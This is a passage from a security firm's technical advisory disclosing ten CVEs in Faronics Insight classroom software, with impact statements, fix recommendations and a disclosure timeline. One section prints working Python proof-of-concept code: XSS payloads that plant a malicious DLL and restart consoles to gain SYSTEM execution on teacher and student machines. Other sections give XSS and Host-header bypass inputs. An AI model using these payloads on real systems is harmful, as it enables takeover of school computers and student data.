from the same directory that the application runs from.
During this vulnerability research, it was observed that both the student and
teacher agent/servers respectively attempt to load Microsoft DLLs from the
application’s installation directory, as this screenshot from ProcMon
demonstrates –
The screenshot above shows three instances where FITeacherSVC.exe (which runs as
SYSTEM) attempts to load a system DLL from the current working directory rather
than the intended directory.
Combined with the other vulnerabilities identified in this application during
this vulnerability research, it was possible to place a malicious “sas.dll” into
the “C:\Program Files\Faronics\Insight Teacher” (and Insight Student) directory,
granting code execution on the next Faronics Insight restart.
Overall the following system DLLs are being loaded unsafely in the student and
teacher consoles –
* WTSAPI32.dll
* sas.dll
* USERENV.dll
* WINSTA.dll
* Profapi.dll
* Dbghelp.dll
* IPHLPAPI.dll
* WINMM.dll
* CRYPTBASE.DLL
* Powrprof.dll
* UMPDC.dll
* Sspicli.dll
* Node.dll
RECOMMENDATION
System DLLs, which are guaranteed to be present inside of Windows system
directories (C:\Windows, C:\Windows\SYSTEM32) should have their include paths
hardcoded. Instead of linking to, for example, “sas.dll” in the build
environment it is safer to link to “C:\Windows\System32\sas.dll” directly.
2. SYSTEMIC STORED AND REFLECTED CROSS SITE SCRIPTING FLAWS (CVE-2023-28350)
Risk: High (8.7 CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:H)
SUMMARY
Attacker supplied input is not validated/sanitized prior to being rendered in
both the Teacher and Student Console applications, enabling the attacker to
execute JavaScript in these applications.
IMPACT
Due to the rich and highly privileged functionality offered by the Teacher
Console, the ability to silently exploit Cross Site Scripting (XSS) on the
Teacher’s machine enables RCE on any connected student machine (and the
teacher’s machine).
DETAILS
Cross Site Scripting (XSS) is a vulnerability category commonly found in web
applications. The vulnerability occurs when applications accept user supplied
input and then render it directly on a webpage without first sanitizing it /
ensuring that it is safe. When unsanitized user input is rendered in a web
application it can frequently be used to execute JavaScript in a victim’s
browser.
Both the Teacher and Student Insight UI applications are “Electron”
applications, meaning that they are effectively rich JavaScript-based web
applications embedded inside of an executable file. Because Electron apps are
essentially web applications, they are especially vulnerable to XSS
vulnerabilities and significant attention must be paid to input validation.
During this vulnerability research, NCC Group researchers observed that there is
almost no input validation present across either of the Insight UI applications,
allowing for trivial compromise via XSS.
Some of the many identified XSS vectors are listed below –
* Keystroke logs
* Student device login names
* Student desktop names
* Class ID
* Quiz names
* Chat messages*
It is worth noting that some of the above XSS vectors are only exploitable by
directly HTTP POSTing malicious data to the API, which is then rendered unsafely
in the UI. In general, the barrier to storing malicious payloads in the UI is
because of field length restrictions, rather than any input validation in the
UI.
“Chat messages” above is marked with an asterisk because chat messages are
generally sanitized, however it was observed that messages containing “<b>
</b>”, “<a> </a>” and “<i> </i>” are not sanitized (presumably to enable
formatted messages between teacher and student.) and are therefore exploitable
by sending malicious messages such as “<b> </b><script>alert(“NCC Group
XSS”);</script>”. A slightly more sophisticated example of this in action can be
seen below –
As noted above in the impact statement, the lack of input sanitization in the
Faronics Insight product is especially dangerous because the product exposes
numerous JavaScript functions which can be used to transfer files to / from
various machines, start / stop executables on student machines, uninstall the
insight product, software-lock workstations etc.
RECOMMENDATION
When rendering user submitted data in either the Student or Teacher console,
encode the output based on the appropriate context of where the output is
included. Content placed into HTML needs to be HTML-encoded, for example. To
work in all situations, HTML encoding functions should encode the following
characters: single and double quotes, backticks, angle brackets, forward and
backslashes, equals signs, and ampersands.
An additional line of defense is to perform validation on both the presentation
tier, in the client-side JavaScript, and on the server-side, in the Express
server. Validating input in both tiers of the application will help to ensure
that users cannot simply circumvent client side controls by simply submitting
malicious payloads to the server.
3. RCE AS SYSTEM VIA UNAUTHENTICATED FILE UPLOAD API (CVE-2023-28353)
Risk: Critical (9.6 CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)
SUMMARY
An unauthenticated attacker is able to upload any type of file to any location
on the Teacher Console’s computer, enabling a variety of different exploitation
paths including code execution. It is also possible for the attacker to chain
this vulnerability with other identified (and disclosed) vulnerabilities to
cause a deployed DLL file to immediately execute as SYSTEM.
IMPACT
A remote unauthenticated attacker can gain code execution as SYSTEM on the
teacher’s computer, this is the highest privilege level in Windows and
constitutes a total system compromise.
DETAILS
The Faronics Insight teacher application contains functionality which is able to
force student devices to upload files from a given folder on their machine. This
functionality operates as follows –
* Teacher Console sends an “uploadstudentfile” WebSocket message to a given
Student Console
* This message contains the source path, source file name and destination on
the Teacher Console to save the file to.
* Student Console sends the file over an unauthenticated HTTP POST multipart
request, complete with the downloaded file, file name and destination path
* The ‘FITeacherServer.exe’ process (which runs as SYSTEM) writes the file to
the destination path, anywhere on disk.
It was observed as part of this vulnerability research that a network connected
attacker with knowledge of a student’s agent ID, which is trivial to obtain by
abusing Faronics UDP broadcast discovery mechanism, is able to send arbitrary
files to this API endpoint and deploy them anywhere on the teacher’s disk.
At this point there are clearly numerous different ways that this could be
abused to obtain privileged code execution, ranging from deploying the file to
an administrator’s “Startup” directory to overwriting any number of files under
C:\Windows\System32 to achieve persistence as SYSTEM.
NCC Group researchers instead chose to chain three vulnerabilities in Faronics
Insight together to achieve a more immediate RCE as SYSTEM –
1. Upload a malicious copy of “sas.dll” to “C:\Program Files\Faronics\Insight
Student” using the API
2. Leverage the “Fake Student Console” zero click XSS vulnerability to call
“<script>relaunchInsight();</script>”, restarting the Teacher Console
process
3. Leverage the DLL hijacking vulnerability such that when Insight relaunches,
it attempts to load the malicious “sas.dll” DLL file and executes the
malicious code within as SYSTEM.
The following screenshot demonstrates the result of this exploit chain, that a
new administrator named OLIVER_BROOKS_NCC2 was created –
RECOMMENDATION
NCC Group recommends that additional access controls are implemented which
restrict an unauthorized/unauthenticated attacker from submitting files to the
API. These access controls could be implemented by requiring valid Student
Consoles to submit a valid session ID cookie with every HTTP request.
NCC Group recommends that the Teacher Console is updated to restrict file
uploads to a particular directory, this will help to ensure that in the event of
a Student Console compromise, an attacker is unable to persist files in
arbitrary locations on the Teacher’s file system.
Finally, NCC Group recommends that some consideration is given to the principal
of least privilege. If the “FITeacherServer.exe” could successfully function
when executed by a lower privileged user then it would be safer to do so, this
would greatly lower the severity of any code execution vulnerabilities which
emerge in the future.
4. RCE AS SYSTEM VIA ARTIFICIAL STUDENT CONSOLE AND XSS (CVE-2023-28347)
Risk: Critical (9.6 CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)
SUMMARY
It is possible for an attacker to create a proof of concept script which
functions similarly to a Student Console, providing unauthenticated attackers
with the ability to exploit XSS vulnerabilities within the Teacher Console
application and gain RCE in a ‘Zero Click’ manner.
IMPACT
Due to the rich and highly privileged functionality offered by the Teacher
Console, the ability to silently exploit XSS on the Teacher Machine enables
remote code execution on any connected student machine (and the teacher’s
machine).
DETAILS
NCC Group researchers observed that, in the default installation configuration,
the Teacher Console application contains no authentication or authorization
logic when allowing Student Consoles to connect. Because of this, it is possible
for an attacker to create their own “Student Console” like application which is
purpose-built to exploit flaws in the Teacher Console and connected Student
Consoles.
As noted in the Technical Advisory named “RCE as SYSTEM via Artificial Teacher
Console”, after going through the UDP handshake process, Student Consoles
automatically open a WebSocket connection with the Teacher Console and begin
receiving instructions.
NCC Group researchers also observed that when a malicious (artificial) Student
Console is created, it is possible to exploit a Cross Site Scripting
vulnerability in the “loggedInUser” field of the initial “updateSTAgentStatus”
call. The Teacher Console simply renders whatever “loggedInUser” field is
provided straight into the DOM and any JavaScript in that field is immediately
executed without any user interaction.
As such, a small proof of concept exploit was developed which performs the
following steps –
* Abuses the UDP broadcast API to get all active student IDs
* Abuses the UDP broadcast API to get the teacher’s IP and ID
* Uploads a malicious DLL file to the teacher’s machine using the
“/api/uploadFiles” endpoint
* Creates a WebSocket connection to the Teacher Console
* For every active student, it submits a malicious “updateSTAgentStatus” HTTP
request to the teacher which contains the following XSS payload –
# Start compromising all students.
for student in studentIDs:
# Inspiration for this exploit from teacher.js line 12213
# Send the DLL to the students
json={
"macAddresses":"00:00:00:00:00:00",
"ipAddresses":"999.999.999.999",
"loggedInUser":"<script>sendActionOnSocket({type: 1,handlerFuncName : \"updateAgent\",data: {fileName:\"../../../../Program Files/Faronics/Insight Student/sas.dll\", downloadFilePath:\"/installers/sas.dll\"}, targets: [\""+student+"\"]});</script>",
"os":"windows",
"hostName":"DESKTOP-irrelevant",
"limiting":{"web":0,"apps":0,"print":0,"drives":0,"lockScreen":0,"muteSpeaker":0,"lockKbdM":0},
"lastKnownState":{"assessmentMode":0,"handRaised":0,"monitorIndex":0},
"monitorCount":1,
"screenSharingAllowed":True,
"isUserLoggedIn":True,
"canChangePreferredName":True,
"hasMic":True,
"version":"11.21.2100.262",
"agentId":desiredMachineID.decode("ascii"),
"classId":"Class101","preferredName":""
}
requests.post(f"http://{teacherIP}:8890/api/updateSTAgentStatus/{desiredMachineID.decode('ascii')}", json=json)
Observe that within the “loggedInUser” field is a JavaScript payload which
compels a Student Console to execute the “updateAgent” command by retrieving the
malicious “sas.dll” file and deploying it to the Faronics Insight installation
directory. The proof of concept then abuses the XSS vulnerability again to force
all connected Student Consoles to restart using the “restartInsightAgent”
command –
time.sleep(3)
# Instruct the students to restart insight, causing the DLL to be loaded and execute, creating a new user (OLIVER_BROOKS_NCC2:FaNcYfEaSt%2)
json={
"macAddresses":"00:00:00:00:00:00",
"ipAddresses":"999.999.999.999",
"loggedInUser":"<script>sendActionOnSocket({type: 1,handlerFuncName : \"restartInsightAgent\",targets: [\""+student+"\"]});</script>",
"os":"windows",
"hostName":"DESKTOP-irrelevant",
"limiting":{"web":0,"apps":0,"print":0,"drives":0,"lockScreen":0,"muteSpeaker":0,"lockKbdM":0},
"lastKnownState":{"assessmentMode":0,"handRaised":0,"monitorIndex":0},
"monitorCount":1,
"screenSharingAllowed":True,
"isUserLoggedIn":True,
"canChangePreferredName":True,
"hasMic":True,
"version":"11.21.2100.262",
"agentId":desiredMachineID.decode("ascii"),
"classId":"Class101","preferredName":""
}
requests.post(f"http://{teacherIP}:8890/api/updateSTAgentStatus/{desiredMachineID.decode('ascii')}", json=json)
At this point, code execution as SYSTEM has been achieved on every connected
student’s machine.
Finally, the script uploads the same malicious DLL file to the teacher’s
Faronics Insight installation directory and compels the Teacher Console to
restart by abusing the XSS vulnerability –
# All students are compromised at this point, now we get RCE on the teacher too using the same trick
# Step 4: Send the DLL again and put it in the Insight Teacher directory to get RCE on the teacher
sharedCode.sendFileToTeacher(teacherIP, desiredMachineID.decode("ascii"), localPath, "C:\\Program Files\\Faronics\\Insight Teacher\\", True)
# Quick sleep to make sure everything's planted correctly.
time.sleep(3)
# Step 5: Use XSS to trigger a restart on the teacher machine using the relaunchInsight(); Javascript function
json={
"macAddresses":"00:00:00:00:00:00",
"ipAddresses":"999.999.999.999",
"loggedInUser":"<script>relaunchInsight();</script>",
"os":"windows",
"hostName":"DESKTOP-irrelevant",
"limiting":{"web":0,"apps":0,"print":0,"drives":0,"lockScreen":0,"muteSpeaker":0,"lockKbdM":0},
"lastKnownState":{"assessmentMode":0,"handRaised":0,"monitorIndex":0},
"monitorCount":1,
"screenSharingAllowed":True,
"isUserLoggedIn":True,
"canChangePreferredName":True,
"hasMic":True,
"version":"11.21.2100.262",
"agentId":desiredMachineID.decode("ascii"),
"classId":"Class101","preferredName":""
}
requests.post(f"http://{teacherIP}:8890/api/updateSTAgentStatus/{desiredMachineID.decode('ascii')}", json=json)
# Step 6: cleanup and be stealthy
# Not yet implemented
sio.disconnect()
At this point, RCE has been achieved on the teacher’s machine and every
connected student’s machine by abusing a zero-click XSS vulnerability.
It should be noted, however, that the artificial Student Console could be
amended to abuse the XSS vulnerability in any number of ways, including scraping
all active Student Console’s file systems and overwriting critical system files
to achieve a persistent Denial of Service.
RECOMMENDATION
As noted in the other provided Technical Advisories in this bundle, NCC Group
strongly recommends that the Teacher Console is updated to require
authentication from any Student Console, including requiring a valid session
cookie or JWT with every HTTP request from a Student Console.
Requiring authentication with every request will help to mitigate this
vulnerability, because it will remove an attacker’s ability to create and
operate artificial Student Consoles.
5. RCE AS SYSTEM VIA ARTIFICIAL TEACHER CONSOLE (CVE-2023-28349)
Risk: Critical (9.6 CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)
SUMMARY
It is possible for an attacker to create an exploit which functions similarly to
the Teacher Console, which compels Student Consoles to connect and exploit
themselves automatically.
IMPACT
Remote attackers are able to gain covert remote code execution and surveillance
capabilities on student machines by masquerading as a valid Teacher Console.
DETAILS
As part of this vulnerability research, researchers spent some time analysing
how Student Consoles and Teacher Consoles connect to one another in the default
configuration. The following steps were observed before any connection is made.
1. The Student Console Windows service (FIStudentSvc.exe) starts, which starts
the Student Agent (FIStudentAgent.exe) as SYSTEM
2. The Teacher Console Windows service (FITeacherSvc.exe) is started, which
starts the Teacher Server (FITeacherServer.exe) as SYSTEM
3. The Teacher Server begins making periodic “DISCO” (discovery) UDP broadcasts
to 255.255.255.255 on port 8889 indicating that the teacher console is
available
4. All active Student Agent applications respond directly to those broadcasts
with a UDP RESP (response) packet. The RESP packet contains their “agent
ID”, a unique UUID-like identifier for that Student.
5. The Teacher then sends a UDP START packet to the student, which compels them
to automatically perform the following four steps –
* Make a HTTP request to the Teacher Console at “/api/getClassSettings” to
obtain some basic settings about the class
* Make a HTTP request to “/api/updateSTAgentStatus” to provide the Teacher
with some basic details about the Student Console
* Make a HTTP request to the Teacher at the “/socket.io/” endpoint to start
a Websocket session where the Teacher Console Command and Control is
performed
* Make repeated HTTP requests to the API endpoints at
“/api/uploadscreenshots” and “/api/appKeystrokeLogs” which provide the
Teacher Console with an image of the student’s desktop and a running
record of every key that the student types.
At no point during the above sequence of operations is any kind of cryptographic
handshake performed to ensure the validity of a Teacher Console, the Student
Console is simply compelled to connect and begin divulging keylogger data and
screenshots simply by virtue of being provided the UDP “START” packet.
Once the WebSocket connection is setup, a Teacher Console can begin sending
commands to the student desktop like “downloadFile”, “launchApp” and
“restartInsight”. Having the ability to compel a Student Console to execute
these commands paves the way for arbitrary file write and RCE as SYSTEM.
NCC Group researchers created a proof of concept which sends the DISCO UDP
broadcast, sends a START packet to any student which responds and then spins up
a websocket / HTTP server to handle all requests from the connecting Student
Console. The proof of concept then deploys “sas.dll” to the Faronics Student
installation directory, commands the application to restart with the
“restartInsight” WebSocket command and achieves RCE as SYSTEM using the DLL
hijacking vulnerability described in the DLL Hijacking technical advisory.
RECOMMENDATION
NCC Group strongly recommends that the initial UDP broadcast challenge/response
system is amended to include some form of cryptographic handshake, using a
either a pre-shared key which is set at application install time for both the
Teacher Console and Student Consoles or alternatively both Student and Teacher
consoles could reach out to a Faronics cloud API to obtain a keypair which could
be used for authentication. If the Student Console was able to verify that they
are connecting to a legitimate Teacher Console by decrypting a “challenge” in
the DISCO packet and sending an encrypted “response” in the RESP packet then
this vulnerability would be immediately mitigated.
6. ALL DATA TRANSMITTED IN PLAINTEXT ENABLING MITM (CVE-2023-28348)
Risk: High (7.1 CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N)
SUMMARY
Data transmitted between Student Consoles and Teacher Consoles is sent over
plaintext HTTP and plaintext WebSockets.
IMPACT
A suitably positioned attacker could perform a person-in-the-middle attack on
either a connected student or teacher and intercept student keystrokes or modify
executable files being sent from teachers to students.
DETAILS
The Faronics Insight application allows teachers (running the Teacher Console)
to administer student devices (running the Student Console). The Teacher Console
compels Student Consoles to perform various activities by sending commands over
WebSockets, the Student Console responds to these commands either directly over
the WebSocket or using the HTTP API exposed by the Teacher Console on port 8890.
Because neither the webserver nor the WebSocket server utilize TLS, it is
possible for an attacker to perform a classic ‘person-in-the-middle’ attack to
intercept, monitor and manipulate communications between teachers and students.
RECOMMENDATION
NCC Group recommends that Faronics ensures that all API traffic and WebSocket
traffic is sent over HTTPS and TLS enabled WebSockets. Socket.IO (the WebSocket
library used by this application suite) supports TLS out of the box according to
the documentation.
7. ENHANCED SECURITY MODE MAY BE BYPASSED (CVE-2023-28352)
Risk: High (8.8 CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
SUMMARY
Each of the vulnerabilities identified within this bundle of Technical
Advisories all execute successfully even when Enhanced Security Mode is enabled.
IMPACT
An attacker controlled artificial Student Console can connect to and attack a
Teacher Console even after Enhanced Security Mode has been enabled.
DETAILS
The Faronics Insight Teacher and Student Consoles expose a function at either
install time or at runtime called “Enhanced Security”. This functionality is
intended to prevent arbitrary Student Consoles from being able to connect to a
class, as well as to prevent arbitrary Teacher Consoles from presenting
themselves and compelling Student Consoles to join them.
The Enhanced Security functionality forms an effective security measure against
unmodified and legitimate Consoles. If a Student Console and Teacher Console do
not have the same Enhanced Security key, a student will not be able to join a
teacher, and a teacher will not be able to compel a student to join.
It can be seen here within Wireshark that when Enhanced Security mode is enabled
on both Consoles, two Consoles will be unable to discover each other with UDP
broadcasts if they have differing keys –
It appears that this functionality works by setting an encoded or encrypted
section in the UDP broadcasts, which the other party is able/unable to decrypt
if their keys match/don’t match respectively.
As part of this vulnerability research, NCC Group researchers observed that if
UDP DISCO / RESP / START broadcast packets were simply transmitted without the
encoded payload by an artificial Teacher or Student Console then both students
and teachers would respond to them, allowing the malicious Console to complete
the handshake successfully and either compel Student Consoles to connect or to
successfully connect to a Teacher Console as appropriate.
Because of this, each of the supplied Technical Advisories are valid and each of
the developed proof-of-concept scripts execute successfully even when Enhanced
Security mode is enabled.
RECOMMENDATION
NCC Group recommends that the Enhanced Security mechanisms are updated in both
the Teacher and Student Consoles such that if a UDP broadcast is received which
doesn’t contain the encoded portion then it is simply ignored. This will act as
an effective mitigation against malicious Teacher Consoles compelling Student
Consoles to connect.
NCC Group also recommends that the Teacher Console is updated to validate that
connections are being made from a Student Console which also has both Enhanced
Security enabled, and has the correct Enhanced Security key set. This could be
validated as part of a HTTP header containing an encrypted and encoded payload,
for example.
8. VIRTUAL HOST ROUTING CAN BE DEFEATED (CVE-2023-28346)
Risk: Low (2.8 CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N)
SUMMARY
It is possible for a remote attacker to communicate with the private API
endpoints exposed on “/login”, “/consoleSettings”, “/console” etc. despite
Virtual Host Routing being used to block this access.
IMPACT
Remote attackers can interact with private pages on the webserver, enabling them
to perform privileged actions such as logging into the console and changing
console settings if they have valid credentials.
DETAILS
The Faronics Insight Teacher Console exposes a HTTP server on port 8890. The
server offers a set of public API endpoints under “/api/*’ which don’t require
any authentication. These endpoints are used by Student Consoles to transmit
data back and forth from the Teacher Console.
The webserver on port 8890 also exposes another set of endpoints such as
“/login”, “/consoleSettings”, “/console” which are only accessible if the user
attempts to access them using, for example, http://127.0.0.1:8890 or
http://localhost:8890. Attempts to communicate with the webserver remotely are
blocked with a 404 error.
During this vulnerability research, it was identified that it’s possible to
supply a HTTP “Host” header with a value of “localhost:8890” in order to defeat
this control and access the console remotely. Defeating the Virtual Host Routing
control enables any network connected attacker to begin auditing and attacking
the product as if they were situated on localhost.
RECOMMENDATION
NCC Group anticipates that Faronics developers are likely using a library such
as VHost as Virtual Host Routing middleware for Express. In addition to using
such a middleware, NCC Group suggests that each of the private (localhost only)
API endpoints implement a check to ensure that the IP address of the HTTP
requestor is either “localhost” or “127.0.0.1”.
An alternative solution which requires more extensive architectural changes
would be to setup a second webserver which hosts the private API endpoints,
configured to only listen for HTTP traffic from localhost.
9. KEYSTROKE LOGS ARE STORED IN PLAINTEXT IN A WORLD READABLE DIRECTORY
(CVE-2023-28351)
Risk: Medium (6.5 CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N)
SUMMARY
Every keystroke made by any user on a computer with Faronics Insight Student
installed is logged to a world readable directory.
IMPACT
An attacker with physical or local access to a computer with Faronics Insight
installed can trivially extract the plaintext keystrokes of any student who has
used the machine, potentially enabling them to obtain PII and/or to compromise
personal accounts owned by the victim.
DETAILS
The Faronics Insight Student Console application silently logs every keystroke
made by a user, these keystroke logs are periodically transmitted as a JSON
payload over a HTTP WebSocket to the Teacher Console where they are made
available for the teacher to view them.
During this vulnerability research, it was observed that the keystroke logs are
stored in “C:\ProgramData\Faronics\Insight\Data\KeyLogs”, a world readable
folder where every individual plaintext keystroke log is readable by any user on
the Student Console machine.
It’s unclear how long these log files remain present in this directory before
they are purged, but their presence on the machine constitutes a threat to the
privacy of the user’s whose keys are being logged by Faronics Insight.
RECOMMENDATION
NCC Group recommends that all keystroke logging activity is performed in memory
as opposed to storing files on disk, so that after keystrokes are transmitted to
the Teacher Console there is no trace of the keystroke logs remaining on disk.
Alternatively, if the logs must be kept on disk for a short amount of time, then
the “C:\ProgramData\Faronics\Insight\Data\KeyLogs” directory must have its
permissions restricted such that only an administrator or SYSTEM can access
them, additionally the files should be encrypted at rest in order to help to
protect the student’s privacy.
10. LACK OF ACCESS CONTROLS ON STUDENT APIS (CVE-2023-28344)
Risk: Medium (6.5 CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)
SUMMARY
The Insight Teacher Console application allows unauthenticated attackers to view
constantly updated screenshots of student desktops and to submit falsified
screenshots on behalf of students.
IMPACT
Attackers are able to view screenshots of student desktops without their
consent. These screenshots may potentially contain sensitive/personal data.
Attackers can also rapidly submit falsified images, hiding the actual contents
of student desktops from the Teacher Console.
DETAILS
Student Consoles submit screenshots over HTTP POST to the Teacher Console’s
webserver on the API endpoint at “/api/uploadscreenshot/agent_id”, where
agent_id is the unique UUID-like string which uniquely identifies a connected
student’s Console.
By default, Student Consoles will silently transmit a screenshot of the
student’s desktop to the teacher every few seconds. The Teacher Console then
retrieves these screenshots via HTTP GET from
“/uploads/screenshots/agent_id.jpeg” and renders them in the Console. The API
endpoint at “/uploads/screenshots/agent_id.jpeg” requires no authentication or
authorization to view the uploaded images, because of this, a network connected
attacker is able to obtain the images simply by navigating to the correct URL
for a given agent ID.
Exposing these images to anyone on the network may potentially inadvertently
leak a student’s Personally Identifiable Information (PII) to anyone who is able
to guess or otherwise determine the student’s agent ID.
Additionally, because Student Consoles submit their screenshots reasonably
quickly and because the Teacher API has no rate limiting measures in place, it
is possible for an attacker to query the API rapidly and repeatedly in order to
obtain a low framerate “video” feed of the student’s device.
In addition to a lack of access controls on the screenshot-retrieval API, there
is also no access control present on the API endpoint which allows students to
submit screenshots to the server (“/api/uploadscreenshot/agent_id”).
Lack of access controls on this API endpoint allows any network connected user
to send images to the Teacher Console on behalf of a victim Student Console.
When the Teacher Console receives these images it then immediately renders them
instead of the targeted student’s actual desktop.
In addition to the above two access control lapses, there is also no access
control present on the API endpoint which enables Student Consoles to upload the
keystrokes that they’ve logged from users. Lack of access control on this API
endpoint enables an attacker to submit arbitrary keystrokes to the API on behalf
of a student, allowing them to decrease the quality of the logged keystrokes.
RECOMMENDATION
NCC Group recommends that the API is updated to only return student device
screenshots when HTTP requests originate from localhost, this way the
screenshots will not be available to users who attempt to interact with the API
remotely.
Additionally, NCC Group recommends that access controls are implemented to
prevent arbitrary users from submitting screenshots on behalf of students.
Finally, as a general recommendation for the entire application, NCC Group
recommends that the Teacher Console is updated to require that a unique session
ID be provided with every HTTP request from Student Consoles. A unique session
ID, combined with TLS, will help to ensure that requests from student consoles
are legitimate.
11. TEACHER CONSOLE CREDENTIALS EXPOSED VIA API ENDPOINT (CVE-2023-28345)
Risk: Medium (4.0 CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)
SUMMARY
The Insight Teacher Console application exposes the teacher’s Console password
in plaintext via an API endpoint accessible from localhost.
IMPACT
Attackers with physical access to the Teacher Console can open a web browser,
navigate to the affected endpoint and obtain the teacher’s password. This
enables them to log into the Teacher Console and begin trivially attacking
student machines.
DETAILS
The Faronics Insight Teacher Console exposes a HTTP server on port 8890. One of
the API endpoints available only when making requests to the API from localhost
is “/consoleSettings”, this API endpoint returns basic configuration details
about the Teacher Console –
Included within this response is the teacher’s password in plaintext (along with
the license key and console versions). Exposing this data in plaintext via the
API enables an attacker with physical access to retrieve the teacher’s
credentials and log in to the Teacher Console.
Because the Teacher Console enables teachers to remotely control student
machines via a pseudo-VNC, access to the Teacher Console enables an attacker to
trivially compromise any connected student machine.
Because of the flaws highlighted in the Technical Advisory named “Virtual Host
Routing Can Be Defeated”, any network connected attacker can connect to this API
endpoint and obtain these credentials.
RECOMMENDATION
NCC Group recommends against exposing credentials and license keys via API
endpoints. As such, the “consoleSettings” API endpoint should be reconfigured to
return a minimal set of configuration data to remove this attack vector.
If there is an unavoidable requirement to expose the credentials via this API
endpoint, NCC Group strongly recommends that the data is first encrypted and
then encoded with base64. This will require a small modification to enable API
consumers to decrypt that data, but it will slightly minimize the risk of
compromise.
DISCLOSURE TIMELINE
* 02/01/2023 – First contact with vendor to setup a secure channel to share the
vulnerabilities
* 02/01/2023 – Technical Advisories submitted to Faronics
* 02/23/2023 – Contact re-established with Faronics to check how the fixes were
progressing
* 03/03/2023 – Re-established contact to set a firm disclosure date of April
28th
* 03/14/2023 – CVE numbers assigned and shared with Faronics
* 04/28/2023 – Contact made with Faronics to query the status of the fixes
* 05/01/2023 – Faronics indicated that the disclosure date would be missed, a
QA build would be coming soon
* 05/03/2023 – A QA build of Faronics Insight was given to NCC Group to
validate the fixes
* 05/04/2023 – The QA build was confirmed to have mitigated all of the
identified vulnerabilities
* 05/17/2023 – Reached out to Faronics once again to enquire about their
readiness to release the patch
* 5/17/2023 – Faronics publishes v11.23.x.289 containing fixes (release notes)
THANKS TO
I would like to praise the Faronics team on their professionalism,
responsiveness and the commitment to the security of their product.
I would also like to thank Jeremy Boone, an NCC Group Technical Director, for
his QA efforts and for always patiently answering any silly question which I
pose to him.
Finally I’d like to thank my colleague Julian Yates for his QA efforts, and for
being an excellent sounding board during this vulnerability research.
ABOUT NCC GROUP
NCC Group is a global expert in cybersecurity and risk mitigation, working with
businesses to protect their brand, value and reputation against the
ever-evolving threat landscape. With our knowledge, experience and global
footprint, we are best placed to help businesses identify, assess, mitigate
respond to the risks they face. We are passionate about making the Internet
safer and revolutionizing the way in which organizations think about
cybersecurity.
SHARE THIS:
* Twitter
* Reddit
* LinkedIn
* Facebook
*
LIKE THIS:
Like Loading...
Published by Oliver Brooks
Published by Oliver Brooks
View all posts by Oliver Brooks ->
HERE ARE SOME RELATED ARTICLES YOU MAY FIND INTERESTING
EUROCRYPT 2023: DEATH OF A KEM
Last month I was lucky enough to attend Eurocrypt 2023, which took place in
Lyon, France. It was my first chance to attend an academic cryptography
conference and the experience sat somewhere in between the familiar cryptography
of the Real World Crypto conference and the abstract world of black holes…
Conferences
Cryptography
June 1, 2023
9 mins read
REVERSE ENGINEERING COIN HUNT WORLD’S BINARY PROTOCOL
Introduction We are going to walk through the process we took to reverse
engineer parts of the Android game Coin Hunt World. Our goal was to identify
methods and develop tooling to cheat at the game. Most of the post covers
reverse engineering the game’s binary protocol and using that…
Gaming & Media
Research
May 31, 2023
26 mins read
TOOL RELEASE: CODE QUERY (CQ)
Code Query is a new, open source universal code security scanning tool. CQ scans
code for security vulnerabilities and other items of interest to
security-focussed code reviewers. It outputs text files containing references to
issues found, into an output directory. These output files can then be reviewed,
filtered by unix…
Tool Release
May 26, 2023
1 min read
Previous post Next post
VIEW ARTICLES BY CATEGORY
* 5G Security & Smart Environments (9)
* Academic Partnership (2)
* Annual Research Report (2)
* Asia Pacific Research (1)
* Awards & Recognition (4)
* Books (17)
* Business Insights (6)
* CIRT (16)
* Cloud & Containerization (31)
* Cloud Security (14)
* Conferences (34)
* Corporate (7)
* Cryptography (96)
* CTFs/Microcorruption (1)
* Current events (1)
* Cyber as a Science (6)
* Cyber Security (398)
* Detection and Threat Hunting (9)
* Disclosure Policy (1)
* Emerging Technologies (10)
* Engineering (5)
* Fox-IT (14)
* Fox-IT and European Research (5)
* Gaming & Media (8)
* Hardware & Embedded Systems (95)
* Intern Projects (2)
* iSec Partners (52)
* Machine Learning (27)
* Managed Detection & Response (23)
* Misinformation, Deepfakes, & Synthetic Media (2)
* North American Research (27)
* Offensive Security & Artificial Intelligence (12)
* Patch notifications (35)
* Presentations (52)
* protocol_name (1)
* Public interest technology (10)
* Public interest technology (1)
* Public Reports (37)
* Public tools (103)
* Reducing Vulnerabilities at Scale (22)
* Research (357)
* Research Paper (19)
* Reverse Engineering (47)
* Risk Management & Governance (6)
* Standards (13)
* Technical advisories (207)
* Technology Policy (1)
* Threat briefs (3)
* Threat Intelligence (67)
* Tool Release (102)
* Transport (16)
* Tutorial/Study Guide (43)
* UK Research (9)
* Uncategorized (23)
* Virtualization, Emulation, & Containerization (9)
* VSR (32)
* Vulnerability (160)
* Whitepapers (235)
MOST POPULAR POSTS
MOST RECENT POSTS
* Eurocrypt 2023: Death of a KEM
* Reverse Engineering Coin Hunt World’s Binary Protocol
* Technical Advisory – Multiple Vulnerabilities in Faronics Insight
(CVE-2023-28344, CVE-2023-28345, CVE-2023-28346, CVE-2023-28347,
CVE-2023-28348, CVE-2023-28349, CVE-2023-28350, CVE-2023-28351,
CVE-2023-28352, CVE-2023-28353)
* Tool Release: Code Query (cq)
* CowCloud
CALL US BEFORE YOU NEED US.
Our experts will help you.
Get in touch
Call us on:
General Number:
441612095200
24/7 Emergency Incident Response:
443316300690
Terms and Conditions Privacy Policy Contact Us Accessibility Disclosure Policy
Assessment & Advisory Detection and Response Compliance Remediation Training
Software Resilience
© NCC Group 2023. All rights reserved.
Loading Comments...
Write a Comment...
Email (Required) Name (Required) Website
%d bloggers like this: